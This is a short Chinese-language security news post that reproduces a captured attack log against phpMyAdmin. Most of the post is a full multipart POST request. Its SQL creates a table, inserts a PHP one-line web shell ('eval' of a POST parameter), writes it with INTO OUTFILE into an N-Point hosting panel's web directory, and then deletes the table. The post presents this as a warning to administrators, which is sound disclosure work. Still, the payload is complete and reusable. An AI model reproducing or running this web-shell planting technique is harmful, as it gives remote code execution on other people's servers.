利用phpMyAdmin，MySQL进行挂马的POST提交一句话木马的代码

作者：黑客防线网安来源：浏览次数：0

本篇关键词：利用 phpMyAdmin MySQL

黑客防线网安网讯：一段利用phpMyAdmin，MySQL和N点主机管理系统进行挂马的POST提交一句话木马的代码！

一段利用phpMyAdmin，MySQL和N点主机管理系统进行挂马的POST提交一句话木马的代码！
在一客户的机器上提取的，希望大家以后多加小心，这些你认为很安全的位置正是黑客可能利用的位置！

Mon Feb 18 20:49:34 2013 - Url:http://192.168.0.11/import.php?
{IP}:50.77.8.38
{PostData}:-----------------------------7dd13823120224
Content-Disposition: form-data; name="is_js_confirmed"
0
-----------------------------7dd13823120224
Content-Disposition: form-data; name="db"
test
-----------------------------7dd13823120224
Content-Disposition: form-data; name="token"
90a81bbecd0412af348b2a4bfd52f59d
-----------------------------7dd13823120224
Content-Disposition: form-data; name="pos"
0
-----------------------------7dd13823120224
Content-Disposition: form-data; name="goto"
db_sql.php
-----------------------------7dd13823120224
Content-Disposition: form-data; name="zero_rows"
您的 SQL 语句已成功运行
-----------------------------7dd13823120224
Content-Disposition: form-data; name="prev_sql_query"
-----------------------------7dd13823120224
Content-Disposition: form-data; name="sql_query"
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'C:/Program Files/NpointSoft/npointhost1.9.6/web/ss.php';
Drop TABLE IF EXISTS a;
-----------------------------7dd13823120224
Content-Disposition: form-data; name="sql_delimiter"
;
-----------------------------7dd13823120224
Content-Disposition: form-data; name="show_query"
1
-----------------------------7dd13823120224
Content-Disposition: form-data; name="SQL"
执行
-----------------------------7dd13823120224